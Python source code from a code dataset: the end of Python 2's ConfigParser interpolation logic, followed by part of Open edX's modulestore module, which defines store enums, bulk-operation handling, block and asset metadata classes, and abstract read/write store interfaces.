The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
option = self.optionxform(option)
try:
value = d[option]
except KeyError:
raise NoOptionError(option, section)
if raw:
return value
else:
return self._interpolate(section, option, value, d)
def items(self, section, raw=False, vars=None):
"""Return a list of tuples with (name, value) for each option
in the section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents overrides
any pre-existing defaults.
The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
options = d.keys()
if "__name__" in options:
options.remove("__name__")
if raw:
return [(option, d[option])
for option in options]
else:
return [(option, self._interpolate(section, option, d[option], d))
for option in options]
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
value = rawval
depth = MAX_INTERPOLATION_DEPTH
while depth: # Loop through this until it's done
depth -= 1
if "%(" in value:
value = self._KEYCRE.sub(self._interpolation_replace, value)
try:
value = value % vars
except KeyError, e:
raise InterpolationMissingOptionError(
option, section, rawval, e[0])
else:
break
if "%(" in value:
raise InterpolationDepthError(option, section, rawval)
return value
_KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
def _interpolation_replace(self, match):
s = match.group(1)
if s is None:
return match.group()
else:
return "%%(%s)s" % self.optionxform(s)
class SafeConfigParser(ConfigParser):
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
L = []
self._interpolate_some(option, L, rawval, section, vars, 1)
return ''.join(L)
_interpvar_match = re.compile(r"%\(([^)]+)\)s").match
def _interpolate_some(self, option, accum, rest, section, map, depth):
if depth > MAX_INTERPOLATION_DEPTH:
raise InterpolationDepthError(option, section, rest)
while rest:
p = rest.find("%")
if p < 0:
accum.append(rest)
return
if p > 0:
accum.append(rest[:p])
rest = rest[p:]
# p is no longer used
c = rest[1:2]
if c == "%":
accum.append("%")
rest = rest[2:]
elif c == "(":
m = self._interpvar_match(rest)
if m is None:
raise InterpolationSyntaxError(option, section,
"bad interpolation variable reference %r" % rest)
var = self.optionxform(m.group(1))
rest = rest[m.end():]
try:
v = map[var]
except KeyError:
raise InterpolationMissingOptionError(
option, section, rest, var)
if "%" in v:
self._interpolate_some(option, accum, v,
section, map, depth + 1)
else:
accum.append(v)
else:
raise InterpolationSyntaxError(
option, section,
"'%%' must be followed by '%%' or '(', found: %r" % (rest,))
def set(self, section, option, value):
"""Set an option. Extend ConfigParser.set: check for string values."""
if not isinstance(value, basestring):
raise TypeError("option values must be strings")
ConfigParser.set(self, section, option, value)
| apache-2.0 |
rhndg/openedx | common/lib/xmodule/xmodule/modulestore/__init__.py | 6 | 54191 | """
This module provides an abstraction for working with XModuleDescriptors
that are stored in a database an accessible using their Location as an identifier
"""
import logging
import re
import json
import datetime
from uuid import uuid4
from pytz import UTC
from collections import namedtuple, defaultdict
import collections
from contextlib import contextmanager
import functools
import threading
from operator import itemgetter
from sortedcontainers import SortedListWithKey
from abc import ABCMeta, abstractmethod
from contracts import contract, new_contract
from xblock.plugin import default_select
from .exceptions import InvalidLocationError, InsufficientSpecificationError
from xmodule.errortracker import make_error_tracker
from xmodule.assetstore import AssetMetadata
from opaque_keys.edx.keys import CourseKey, UsageKey, AssetKey
from opaque_keys.edx.locations import Location # For import backwards compatibility
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xblock.runtime import Mixologist
from xblock.core import XBlock
log = logging.getLogger('edx.modulestore')
new_contract('CourseKey', CourseKey)
new_contract('AssetKey', AssetKey)
new_contract('AssetMetadata', AssetMetadata)
new_contract('XBlock', XBlock)
LIBRARY_ROOT = 'library.xml'
COURSE_ROOT = 'course.xml'
class ModuleStoreEnum(object):
"""
A class to encapsulate common constants that are used with the various modulestores.
"""
class Type(object):
"""
The various types of modulestores provided
"""
split = 'split'
mongo = 'mongo'
xml = 'xml'
class RevisionOption(object):
"""
Revision constants to use for Module Store operations
Note: These values are passed into store APIs and only used at run time
"""
# both DRAFT and PUBLISHED versions are queried, with preference to DRAFT versions
draft_preferred = 'rev-opt-draft-preferred'
# only DRAFT versions are queried and no PUBLISHED versions
draft_only = 'rev-opt-draft-only'
# # only PUBLISHED versions are queried and no DRAFT versions
published_only = 'rev-opt-published-only'
# all revisions are queried
all = 'rev-opt-all'
class Branch(object):
"""
Branch constants to use for stores, such as Mongo, that have only 2 branches: DRAFT and PUBLISHED
Note: These values are taken from server configuration settings, so should not be changed without alerting DevOps
"""
draft_preferred = 'draft-preferred'
published_only = 'published-only'
class BranchName(object):
"""
Branch constants to use for stores, such as Split, that have named branches
"""
draft = 'draft-branch'
published = 'published-branch'
library = 'library'
class UserID(object):
"""
Values for user ID defaults
"""
# Note: we use negative values here to (try to) not collide
# with user identifiers provided by actual user services.
# user ID to use for all management commands
mgmt_command = -1
# user ID to use for primitive commands
primitive_command = -2
# user ID to use for tests that do not have a django user available
test = -3
class SortOrder(object):
"""
Values for sorting asset metadata.
"""
ascending = 1
descending = 2
class BulkOpsRecord(object):
"""
For handling nesting of bulk operations
"""
def __init__(self):
self._active_count = 0
self.has_publish_item = False
self.has_library_updated_item = False
@property
def active(self):
"""
Return whether this bulk write is active.
"""
return self._active_count > 0
def nest(self):
"""
Record another level of nesting of this bulk write operation
"""
self._active_count += 1
def unnest(self):
"""
Record the completion of a level of nesting of the bulk write operation
"""
self._active_count -= 1
@property
def is_root(self):
"""
Return whether the bulk write is at the root (first) level of nesting
"""
return self._active_count == 1
class ActiveBulkThread(threading.local):
"""
Add the expected vars to the thread.
"""
def __init__(self, bulk_ops_record_type, **kwargs):
super(ActiveBulkThread, self).__init__(**kwargs)
self.records = defaultdict(bulk_ops_record_type)
class BulkOperationsMixin(object):
"""
This implements the :meth:`bulk_operations` modulestore semantics which handles nested invocations
In particular, it implements :meth:`_begin_bulk_operation` and
:meth:`_end_bulk_operation` to provide the external interface
Internally, this mixin records the set of all active bulk operations (keyed on the active course),
and only writes those values when :meth:`_end_bulk_operation` is called.
If a bulk write operation isn't active, then the changes are immediately written to the underlying
mongo_connection.
"""
def __init__(self, *args, **kwargs):
super(BulkOperationsMixin, self).__init__(*args, **kwargs)
self._active_bulk_ops = ActiveBulkThread(self._bulk_ops_record_type)
@contextmanager
def bulk_operations(self, course_id, emit_signals=True):
"""
A context manager for notifying the store of bulk operations. This affects only the current thread.
In the case of Mongo, it temporarily disables refreshing the metadata inheritance tree
until the bulk operation is completed.
"""
try:
self._begin_bulk_operation(course_id)
yield
finally:
self._end_bulk_operation(course_id, emit_signals)
# the relevant type of bulk_ops_record for the mixin (overriding classes should override
# this variable)
_bulk_ops_record_type = BulkOpsRecord
def _get_bulk_ops_record(self, course_key, ignore_case=False):
"""
Return the :class:`.BulkOpsRecord` for this course.
"""
if course_key is None:
return self._bulk_ops_record_type()
# Retrieve the bulk record based on matching org/course/run (possibly ignoring case)
if ignore_case:
for key, record in self._active_bulk_ops.records.iteritems():
# Shortcut: check basic equivalence for cases where org/course/run might be None.
if key == course_key or (
key.org.lower() == course_key.org.lower() and
key.course.lower() == course_key.course.lower() and
key.run.lower() == course_key.run.lower()
):
return record
return self._active_bulk_ops.records[course_key.for_branch(None)]
@property
def _active_records(self):
"""
Yield all active (CourseLocator, BulkOpsRecord) tuples.
"""
for course_key, record in self._active_bulk_ops.records.iteritems():
if record.active:
yield (course_key, record)
def _clear_bulk_ops_record(self, course_key):
"""
Clear the record for this course
"""
del self._active_bulk_ops.records[course_key.for_branch(None)]
def _start_outermost_bulk_operation(self, bulk_ops_record, course_key):
"""
The outermost nested bulk_operation call: do the actual begin of the bulk operation.
Implementing classes must override this method; otherwise, the bulk operations are a noop
"""
pass
def _begin_bulk_operation(self, course_key):
"""
Begin a bulk operation on course_key.
"""
bulk_ops_record = self._get_bulk_ops_record(course_key)
# Increment the number of active bulk operations (bulk operations
# on the same course can be nested)
bulk_ops_record.nest()
# If this is the highest level bulk operation, then initialize it
if bulk_ops_record.is_root:
self._start_outermost_bulk_operation(bulk_ops_record, course_key)
def _end_outermost_bulk_operation(self, bulk_ops_record, structure_key, emit_signals=True):
"""
The outermost nested bulk_operation call: do the actual end of the bulk operation.
Implementing classes must override this method; otherwise, the bulk operations are a noop
"""
pass
def _end_bulk_operation(self, structure_key, emit_signals=True):
"""
End the active bulk operation on structure_key (course or library key).
"""
# If no bulk op is active, return
bulk_ops_record = self._get_bulk_ops_record(structure_key)
if not bulk_ops_record.active:
return
bulk_ops_record.unnest()
# If this wasn't the outermost context, then don't close out the
# bulk operation.
if bulk_ops_record.active:
return
self._end_outermost_bulk_operation(bulk_ops_record, structure_key, emit_signals)
self._clear_bulk_ops_record(structure_key)
def _is_in_bulk_operation(self, course_key, ignore_case=False):
"""
Return whether a bulk operation is active on `course_key`.
"""
return self._get_bulk_ops_record(course_key, ignore_case).active
def send_bulk_published_signal(self, bulk_ops_record, course_id):
"""
Sends out the signal that items have been published from within this course.
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler and bulk_ops_record.has_publish_item:
signal_handler.send("course_published", course_key=course_id)
bulk_ops_record.has_publish_item = False
def send_bulk_library_updated_signal(self, bulk_ops_record, library_id):
"""
Sends out the signal that library have been updated.
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler and bulk_ops_record.has_library_updated_item:
signal_handler.send("library_updated", library_key=library_id)
bulk_ops_record.has_library_updated_item = False
class EditInfo(object):
"""
Encapsulates the editing info of a block.
"""
def __init__(self, **kwargs):
self.from_storable(kwargs)
# For details, see caching_descriptor_system.py get_subtree_edited_by/on.
self._subtree_edited_on = kwargs.get('_subtree_edited_on', None)
self._subtree_edited_by = kwargs.get('_subtree_edited_by', None)
def to_storable(self):
"""
Serialize to a Mongo-storable format.
"""
return {
'previous_version': self.previous_version,
'update_version': self.update_version,
'source_version': self.source_version,
'edited_on': self.edited_on,
'edited_by': self.edited_by,
'original_usage': self.original_usage,
'original_usage_version': self.original_usage_version,
}
def from_storable(self, edit_info):
"""
De-serialize from Mongo-storable format to an object.
"""
# Guid for the structure which previously changed this XBlock.
# (Will be the previous value of 'update_version'.)
self.previous_version = edit_info.get('previous_version', None)
# Guid for the structure where this XBlock got its current field values.
# May point to a structure not in this structure's history (e.g., to a draft
# branch from which this version was published).
self.update_version = edit_info.get('update_version', None)
self.source_version = edit_info.get('source_version', None)
# Datetime when this XBlock's fields last changed.
self.edited_on = edit_info.get('edited_on', None)
# User ID which changed this XBlock last.
self.edited_by = edit_info.get('edited_by', None)
# If this block has been copied from a library using copy_from_template,
# these fields point to the original block in the library, for analytics.
self.original_usage = edit_info.get('original_usage', None)
self.original_usage_version = edit_info.get('original_usage_version', None)
def __repr__(self):
# pylint: disable=bad-continuation, redundant-keyword-arg
return ("{classname}(previous_version={self.previous_version}, "
"update_version={self.update_version}, "
"source_version={source_version}, "
"edited_on={self.edited_on}, "
"edited_by={self.edited_by}, "
"original_usage={self.original_usage}, "
"original_usage_version={self.original_usage_version}, "
"_subtree_edited_on={self._subtree_edited_on}, "
"_subtree_edited_by={self._subtree_edited_by})").format(
self=self,
classname=self.__class__.__name__,
source_version="UNSET" if self.source_version is None else self.source_version,
) # pylint: disable=bad-continuation
class BlockData(object):
"""
Wrap the block data in an object instead of using a straight Python dictionary.
Allows the storing of meta-information about a structure that doesn't persist along with
the structure itself.
"""
def __init__(self, **kwargs):
# Has the definition been loaded?
self.definition_loaded = False
self.from_storable(kwargs)
def to_storable(self):
"""
Serialize to a Mongo-storable format.
"""
return {
'fields': self.fields,
'block_type': self.block_type,
'definition': self.definition,
'defaults': self.defaults,
'edit_info': self.edit_info.to_storable()
}
def from_storable(self, block_data):
"""
De-serialize from Mongo-storable format to an object.
"""
# Contains the Scope.settings and 'children' field values.
# 'children' are stored as a list of (block_type, block_id) pairs.
self.fields = block_data.get('fields', {})
# XBlock type ID.
self.block_type = block_data.get('block_type', None)
# DB id of the record containing the content of this XBlock.
self.definition = block_data.get('definition', None)
# Scope.settings default values copied from a template block (used e.g. when
# blocks are copied from a library to a course)
self.defaults = block_data.get('defaults', {})
# EditInfo object containing all versioning/editing data.
self.edit_info = EditInfo(**block_data.get('edit_info', {}))
def __repr__(self):
# pylint: disable=bad-continuation, redundant-keyword-arg
return ("{classname}(fields={self.fields}, "
"block_type={self.block_type}, "
"definition={self.definition}, "
"definition_loaded={self.definition_loaded}, "
"defaults={self.defaults}, "
"edit_info={self.edit_info})").format(
self=self,
classname=self.__class__.__name__,
) # pylint: disable=bad-continuation
new_contract('BlockData', BlockData)
class IncorrectlySortedList(Exception):
"""
Thrown when calling find() on a SortedAssetList not sorted by filename.
"""
pass
class SortedAssetList(SortedListWithKey):
"""
List of assets that is sorted based on an asset attribute.
"""
def __init__(self, **kwargs):
self.filename_sort = False
key_func = kwargs.get('key', None)
if key_func is None:
kwargs['key'] = itemgetter('filename')
self.filename_sort = True
super(SortedAssetList, self).__init__(**kwargs)
@contract(asset_id=AssetKey)
def find(self, asset_id):
"""
Find the index of a particular asset in the list. This method is only functional for lists
sorted by filename. If the list is sorted on any other key, find() raises a
Returns: Index of asset, if found. None if not found.
"""
# Don't attempt to find an asset by filename in a list that's not sorted by filename.
if not self.filename_sort:
raise IncorrectlySortedList()
# See if this asset already exists by checking the external_filename.
# Studio doesn't currently support using multiple course assets with the same filename.
# So use the filename as the unique identifier.
idx = None
idx_left = self.bisect_left({'filename': asset_id.path})
idx_right = self.bisect_right({'filename': asset_id.path})
if idx_left != idx_right:
# Asset was found in the list.
idx = idx_left
return idx
@contract(asset_md=AssetMetadata)
def insert_or_update(self, asset_md):
"""
Insert asset metadata if asset is not present. Update asset metadata if asset is already present.
"""
metadata_to_insert = asset_md.to_storable()
asset_idx = self.find(asset_md.asset_id)
if asset_idx is None:
# Add new metadata sorted into the list.
self.add(metadata_to_insert)
else:
# Replace existing metadata.
self[asset_idx] = metadata_to_insert
class ModuleStoreAssetBase(object):
"""
The methods for accessing assets and their metadata
"""
def _find_course_asset(self, asset_key):
"""
Returns same as _find_course_assets plus the index to the given asset or None. Does not convert
to AssetMetadata; thus, is internal.
Arguments:
asset_key (AssetKey): what to look for
Returns:
Tuple of:
- AssetMetadata[] for all assets of the given asset_key's type
- the index of asset in list (None if asset does not exist)
"""
course_assets = self._find_course_assets(asset_key.course_key)
all_assets = SortedAssetList(iterable=[])
# Assets should be pre-sorted, so add them efficiently without sorting.
# extend() will raise a ValueError if the passed-in list is not sorted.
all_assets.extend(course_assets.setdefault(asset_key.block_type, []))
idx = all_assets.find(asset_key)
return course_assets, idx
@contract(asset_key='AssetKey')
def find_asset_metadata(self, asset_key, **kwargs):
"""
Find the metadata for a particular course asset.
Arguments:
asset_key (AssetKey): key containing original asset filename
Returns:
asset metadata (AssetMetadata) -or- None if not found
"""
course_assets, asset_idx = self._find_course_asset(asset_key)
if asset_idx is None:
return None
mdata = AssetMetadata(asset_key, asset_key.path, **kwargs)
all_assets = course_assets[asset_key.asset_type]
mdata.from_storable(all_assets[asset_idx])
return mdata
@contract(
course_key='CourseKey', asset_type='None | basestring',
start='int | None', maxresults='int | None', sort='tuple(str,(int,>=1,<=2))|None'
)
def get_all_asset_metadata(self, course_key, asset_type, start=0, maxresults=-1, sort=None, **kwargs):
"""
Returns a list of asset metadata for all assets of the given asset_type in the course.
Args:
course_key (CourseKey): course identifier
asset_type (str): the block_type of the assets to return. If None, return assets of all types.
start (int): optional - start at this asset number. Zero-based!
maxresults (int): optional - return at most this many, -1 means no limit
sort (array): optional - None means no sort
(sort_by (str), sort_order (str))
sort_by - one of 'uploadDate' or 'displayname'
sort_order - one of SortOrder.ascending or SortOrder.descending
Returns:
List of AssetMetadata objects.
"""
course_assets = self._find_course_assets(course_key)
# Determine the proper sort - with defaults of ('displayname', SortOrder.ascending).
key_func = None
sort_order = ModuleStoreEnum.SortOrder.ascending
if sort:
if sort[0] == 'uploadDate':
key_func = lambda x: x['edit_info']['edited_on']
if sort[1] == ModuleStoreEnum.SortOrder.descending:
sort_order = ModuleStoreEnum.SortOrder.descending
if asset_type is None:
# Add assets of all types to the sorted list.
all_assets = SortedAssetList(iterable=[], key=key_func)
for asset_type, val in course_assets.iteritems():
all_assets.update(val)
else:
# Add assets of a single type to the sorted list.
all_assets = SortedAssetList(iterable=course_assets.get(asset_type, []), key=key_func)
num_assets = len(all_assets)
start_idx = start
end_idx = min(num_assets, start + maxresults)
if maxresults < 0:
# No limit on the results.
end_idx = num_assets
step_incr = 1
if sort_order == ModuleStoreEnum.SortOrder.descending:
# Flip the indices and iterate backwards.
step_incr = -1
start_idx = (num_assets - 1) - start_idx
end_idx = (num_assets - 1) - end_idx
ret_assets = []
for idx in xrange(start_idx, end_idx, step_incr):
raw_asset = all_assets[idx]
asset_key = course_key.make_asset_key(raw_asset['asset_type'], raw_asset['filename'])
new_asset = AssetMetadata(asset_key)
new_asset.from_storable(raw_asset)
ret_assets.append(new_asset)
return ret_assets
# pylint: disable=unused-argument
def check_supports(self, course_key, method):
"""
Verifies that a modulestore supports a particular method.
Some modulestores may differ based on the course_key, such
as mixed (since it has to find the underlying modulestore),
so it's required as part of the method signature.
"""
return hasattr(self, method)
class ModuleStoreAssetWriteInterface(ModuleStoreAssetBase):
"""
The write operations for assets and asset metadata
"""
def _save_assets_by_type(self, course_key, asset_metadata_list, course_assets, user_id, import_only):
"""
Common private method that saves/updates asset metadata items in the internal modulestore
structure used to store asset metadata items.
"""
# Lazily create a sorted list if not already created.
assets_by_type = defaultdict(lambda: SortedAssetList(iterable=course_assets.get(asset_type, [])))
for asset_md in asset_metadata_list:
if asset_md.asset_id.course_key != course_key:
# pylint: disable=logging-format-interpolation
log.warning("Asset's course {} does not match other assets for course {} - not saved.".format(
asset_md.asset_id.course_key, course_key
))
continue
if not import_only:
asset_md.update({'edited_by': user_id, 'edited_on': datetime.datetime.now(UTC)})
asset_type = asset_md.asset_id.asset_type
all_assets = assets_by_type[asset_type]
all_assets.insert_or_update(asset_md)
return assets_by_type
@contract(asset_metadata='AssetMetadata')
def save_asset_metadata(self, asset_metadata, user_id, import_only):
"""
Saves the asset metadata for a particular course's asset.
Arguments:
asset_metadata (AssetMetadata): data about the course asset data
user_id (int): user ID saving the asset metadata
import_only (bool): True if importing without editing, False if editing
Returns:
True if metadata save was successful, else False
"""
raise NotImplementedError()
@contract(asset_metadata_list='list(AssetMetadata)')
def save_asset_metadata_list(self, asset_metadata_list, user_id, import_only):
"""
Saves a list of asset metadata for a particular course's asset.
Arguments:
asset_metadata (AssetMetadata): data about the course asset data
user_id (int): user ID saving the asset metadata
import_only (bool): True if importing without editing, False if editing
Returns:
True if metadata save was successful, else False
"""
raise NotImplementedError()
def set_asset_metadata_attrs(self, asset_key, attrs, user_id):
"""
Base method to over-ride in modulestore.
"""
raise NotImplementedError()
def delete_asset_metadata(self, asset_key, user_id):
"""
Base method to over-ride in modulestore.
"""
raise NotImplementedError()
@contract(asset_key='AssetKey', attr=str)
def set_asset_metadata_attr(self, asset_key, attr, value, user_id):
"""
Add/set the given attr on the asset at the given location. Value can be any type which pymongo accepts.
Arguments:
asset_key (AssetKey): asset identifier
attr (str): which attribute to set
value: the value to set it to (any type pymongo accepts such as datetime, number, string)
user_id (int): user ID saving the asset metadata
Raises:
ItemNotFoundError if no such item exists
AttributeError is attr is one of the build in attrs.
"""
return self.set_asset_metadata_attrs(asset_key, {attr: value}, user_id)
@contract(source_course_key='CourseKey', dest_course_key='CourseKey')
def copy_all_asset_metadata(self, source_course_key, dest_course_key, user_id):
"""
Copy all the course assets from source_course_key to dest_course_key.
NOTE: unlike get_all_asset_metadata, this does not take an asset type because
this function is intended for things like cloning or exporting courses not for
clients to list assets.
Arguments:
source_course_key (CourseKey): identifier of course to copy from
dest_course_key (CourseKey): identifier of course to copy to
user_id (int): user ID copying the asset metadata
"""
pass
# pylint: disable=abstract-method
class ModuleStoreRead(ModuleStoreAssetBase):
"""
An abstract interface for a database backend that stores XModuleDescriptor
instances and extends read-only functionality
"""
__metaclass__ = ABCMeta
@abstractmethod
def has_item(self, usage_key):
"""
Returns True if usage_key exists in this ModuleStore.
"""
pass
@abstractmethod
def get_item(self, usage_key, depth=0, using_descriptor_system=None, **kwargs):
"""
Returns an XModuleDescriptor instance for the item at location.
If any segment of the location is None except revision, raises
xmodule.modulestore.exceptions.InsufficientSpecificationError
If no object is found at that location, raises
xmodule.modulestore.exceptions.ItemNotFoundError
usage_key: A :class:`.UsageKey` subclass instance
depth (int): An argument that some module stores may use to prefetch
descendents of the queried modules for more efficient results later
in the request. The depth is counted in the number of calls to
get_children() to cache. None indicates to cache all descendents
"""
pass
@abstractmethod
def get_course_errors(self, course_key):
"""
Return a list of (msg, exception-or-None) errors that the modulestore
encountered when loading the course at course_id.
Raises the same exceptions as get_item if the location isn't found or
isn't fully specified.
Args:
course_key (:class:`.CourseKey`): The course to check for errors
"""
pass
@abstractmethod
def get_items(self, course_id, qualifiers=None, **kwargs):
"""
Returns a list of XModuleDescriptor instances for the items
that match location. Any element of location that is None is treated
as a wildcard that matches any value
location: Something that can be passed to Location
"""
pass
@contract(block='XBlock | BlockData | dict', qualifiers=dict)
def _block_matches(self, block, qualifiers):
"""
Return True or False depending on whether the field value (block contents)
matches the qualifiers as per get_items.
NOTE: Method only finds directly set value matches - not inherited nor default value matches.
For substring matching:
pass a regex object.
For arbitrary function comparison such as date time comparison:
pass the function as in start=lambda x: x < datetime.datetime(2014, 1, 1, 0, tzinfo=pytz.UTC)
Args:
block (dict, XBlock, or BlockData): either the BlockData (transformed from the db) -or-
a dict (from BlockData.fields or get_explicitly_set_fields_by_scope) -or-
the xblock.fields() value -or-
the XBlock from which to get the 'fields' value.
qualifiers (dict): {field: value} search pairs.
"""
if isinstance(block, XBlock):
# If an XBlock is passed-in, just match its fields.
xblock, fields = (block, block.fields)
elif isinstance(block, BlockData):
# BlockData is an object - compare its attributes in dict form.
xblock, fields = (None, block.__dict__)
else:
xblock, fields = (None, block)
def _is_set_on(key):
"""
Is this key set in fields? (return tuple of boolean and value). A helper which can
handle fields either being the json doc or xblock fields. Is inner function to restrict
use and to access local vars.
"""
if key not in fields:
return False, None
field = fields[key]
if xblock is not None:
return field.is_set_on(block), getattr(xblock, key)
else:
return True, field
for key, criteria in qualifiers.iteritems():
is_set, value = _is_set_on(key)
if isinstance(criteria, dict) and '$exists' in criteria and criteria['$exists'] == is_set:
continue
if not is_set:
return False
if not self._value_matches(value, criteria):
return False
return True
def _value_matches(self, target, criteria):
"""
helper for _block_matches: does the target (field value) match the criteria?
If target is a list, do any of the list elements meet the criteria
If the criteria is a regex, does the target match it?
If the criteria is a function, does invoking it on the target yield something truthy?
If criteria is a dict {($nin|$in): []}, then do (none|any) of the list elements meet the criteria
Otherwise, is the target == criteria
"""
if isinstance(target, list):
return any(self._value_matches(ele, criteria) for ele in target)
elif isinstance(criteria, re._pattern_type): # pylint: disable=protected-access
return criteria.search(target) is not None
elif callable(criteria):
return criteria(target)
elif isinstance(criteria, dict) and '$in' in criteria:
# note isn't handling any other things in the dict other than in
return any(self._value_matches(target, test_val) for test_val in criteria['$in'])
elif isinstance(criteria, dict) and '$nin' in criteria:
# note isn't handling any other things in the dict other than nin
return not any(self._value_matches(target, test_val) for test_val in criteria['$nin'])
else:
return criteria == target
@abstractmethod
def make_course_key(self, org, course, run):
"""
Return a valid :class:`~opaque_keys.edx.keys.CourseKey` for this modulestore
that matches the supplied `org`, `course`, and `run`.
This key may represent a course that doesn't exist in this modulestore.
"""
pass
@abstractmethod
def get_courses(self, **kwargs):
'''
Returns a list containing the top level XModuleDescriptors of the courses
in this modulestore. This method can take an optional argument 'org' which
will efficiently apply a filter so that only the courses of the specified
ORG in the CourseKey will be fetched.
'''
pass
@abstractmethod
def get_course(self, course_id, depth=0, **kwargs):
'''
Look for a specific course by its id (:class:`CourseKey`).
Returns the course descriptor, or None if not found.
'''
pass
@abstractmethod
def has_course(self, course_id, ignore_case=False, **kwargs):
'''
Look for a specific course id. Returns whether it exists.
Args:
course_id (CourseKey):
ignore_case (boolean): some modulestores are case-insensitive. Use this flag
to search for whether a potentially conflicting course exists in that case.
'''
pass
@abstractmethod
def get_parent_location(self, location, **kwargs):
'''
Find the location that is the parent of this location in this
course. Needed for path_to_location().
'''
pass
@abstractmethod
def get_orphans(self, course_key, **kwargs):
"""
Get all of the xblocks in the given course which have no parents and are not of types which are
usually orphaned. NOTE: may include xblocks which still have references via xblocks which don't
use children to point to their dependents.
"""
pass
@abstractmethod
def get_errored_courses(self):
"""
Return a dictionary of course_dir -> [(msg, exception_str)], for each
course_dir where course loading failed.
"""
pass
@abstractmethod
def get_modulestore_type(self, course_id):
"""
Returns a type which identifies which modulestore is servicing the given
course_id. The return can be either "xml" (for XML based courses) or "mongo" for MongoDB backed courses
"""
pass
@abstractmethod
def get_courses_for_wiki(self, wiki_slug, **kwargs):
"""
Return the list of courses which use this wiki_slug
:param wiki_slug: the course wiki root slug
:return: list of course keys
"""
pass
@abstractmethod
def has_published_version(self, xblock):
"""
Returns true if this xblock exists in the published course regardless of whether it's up to date
"""
pass
@abstractmethod
def close_connections(self):
"""
Closes any open connections to the underlying databases
"""
pass
@contextmanager
def bulk_operations(self, course_id, emit_signals=True): # pylint: disable=unused-argument
"""
A context manager for notifying the store of bulk operations. This affects only the current thread.
"""
yield
def ensure_indexes(self):
"""
Ensure that all appropriate indexes are created that are needed by this modulestore, or raise
an exception if unable to.
This method is intended for use by tests and administrative commands, and not
to be run during server startup.
"""
pass
# pylint: disable=abstract-method
class ModuleStoreWrite(ModuleStoreRead, ModuleStoreAssetWriteInterface):
"""
An abstract interface for a database backend that stores XModuleDescriptor
instances and extends both read and write functionality
"""
__metaclass__ = ABCMeta
@abstractmethod
def update_item(self, xblock, user_id, allow_not_found=False, force=False, **kwargs):
"""
Update the given xblock's persisted repr. Pass the user's unique id which the persistent store
should save with the update if it has that ability.
:param allow_not_found: whether this method should raise an exception if the given xblock
has not been persisted before.
:param force: fork the structure and don't update the course draftVersion if there's a version
conflict (only applicable to version tracking and conflict detecting persistence stores)
:raises VersionConflictError: if org, course, run, and version_guid given and the current
version head != version_guid and force is not True. (only applicable to version tracking stores)
"""
pass
@abstractmethod
def delete_item(self, location, user_id, **kwargs):
"""
Delete an item and its subtree from persistence. Remove the item from any parents (Note, does not
affect parents from other branches or logical branches; thus, in old mongo, deleting something
whose parent cannot be draft, deletes it from both but deleting a component under a draft vertical
only deletes it from the draft.
Pass the user's unique id which the persistent store
should save with the update if it has that ability.
:param force: fork the structure and don't update the course draftVersion if there's a version
conflict (only applicable to version tracking and conflict detecting persistence stores)
:raises VersionConflictError: if org, course, run, and version_guid given and the current
version head != version_guid and force is not True. (only applicable to version tracking stores)
"""
pass
@abstractmethod
def create_course(self, org, course, run, user_id, fields=None, **kwargs):
"""
Creates and returns the course.
Args:
org (str): the organization that owns the course
course (str): the name of the course
run (str): the name of the run
user_id: id of the user creating the course
fields (dict): Fields to set on the course at initialization
kwargs: Any optional arguments understood by a subset of modulestores to customize instantiation
Returns: a CourseDescriptor
"""
pass
@abstractmethod
def create_item(self, user_id, course_key, block_type, block_id=None, fields=None, **kwargs):
"""
Creates and saves a new item in a course.
Returns the newly created item.
Args:
user_id: ID of the user creating and saving the xmodule
course_key: A :class:`~opaque_keys.edx.CourseKey` identifying which course to create
this item in
block_type: The type of block to create
block_id: a unique identifier for the new item. If not supplied,
a new identifier will be generated
fields (dict): A dictionary specifying initial values for some or all fields
in the newly created block
"""
pass
@abstractmethod
def clone_course(self, source_course_id, dest_course_id, user_id, fields=None):
"""
Sets up source_course_id to point a course with the same content as the desct_course_id. This
operation may be cheap or expensive. It may have to copy all assets and all xblock content or
merely setup new pointers.
Backward compatibility: this method used to require in some modulestores that dest_course_id
pointed to an empty but already created course. Implementers should support this or should
enable creating the course from scratch.
Raises:
ItemNotFoundError: if the source course doesn't exist (or any of its xblocks aren't found)
DuplicateItemError: if the destination course already exists (with content in some cases)
"""
pass
@abstractmethod
def delete_course(self, course_key, user_id, **kwargs):
"""
Deletes the course. It may be a soft or hard delete. It may or may not remove the xblock definitions
depending on the persistence layer and how tightly bound the xblocks are to the course.
Args:
course_key (CourseKey): which course to delete
user_id: id of the user deleting the course
"""
pass
@abstractmethod
def _drop_database(self):
"""
A destructive operation to drop the underlying database and close all connections.
Intended to be used by test code for cleanup.
"""
pass
# pylint: disable=abstract-method
class ModuleStoreReadBase(BulkOperationsMixin, ModuleStoreRead):
'''
Implement interface functionality that can be shared.
'''
# pylint: disable=invalid-name
def __init__(
self,
contentstore=None,
doc_store_config=None, # ignore if passed up
metadata_inheritance_cache_subsystem=None, request_cache=None,
xblock_mixins=(), xblock_select=None,
# temporary parms to enable backward compatibility. remove once all envs migrated
db=None, collection=None, host=None, port=None, tz_aware=True, user=None, password=None,
# allow lower level init args to pass harmlessly
** kwargs
):
'''
Set up the error-tracking logic.
'''
super(ModuleStoreReadBase, self).__init__(**kwargs)
self._course_errors = defaultdict(make_error_tracker) # location -> ErrorLog
# pylint: disable=fixme
# TODO move the inheritance_cache_subsystem to classes which use it
self.metadata_inheritance_cache_subsystem = metadata_inheritance_cache_subsystem
self.request_cache = request_cache
self.xblock_mixins = xblock_mixins
self.xblock_select = xblock_select
self.contentstore = contentstore
def get_course_errors(self, course_key):
"""
Return list of errors for this :class:`.CourseKey`, if any. Raise the same
errors as get_item if course_key isn't present.
"""
